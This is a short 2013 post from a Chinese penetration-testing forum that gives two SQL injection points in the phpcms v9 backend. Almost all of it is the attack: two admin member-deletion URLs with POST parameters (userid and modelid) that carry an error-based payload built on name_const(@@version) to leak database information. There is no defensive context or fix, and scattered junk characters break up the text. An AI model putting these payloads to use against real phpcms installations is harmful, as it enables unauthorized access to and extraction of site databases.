中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]
作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):
/ K2 N. v, @5 Z/ M

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


) k) [1 n' K" D* |. @; }. S) w# X& t$ V4 Q/ q. S, e. m$ F  h" T& ~
& T5 _# n3 P  k/ t7 R4 x

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2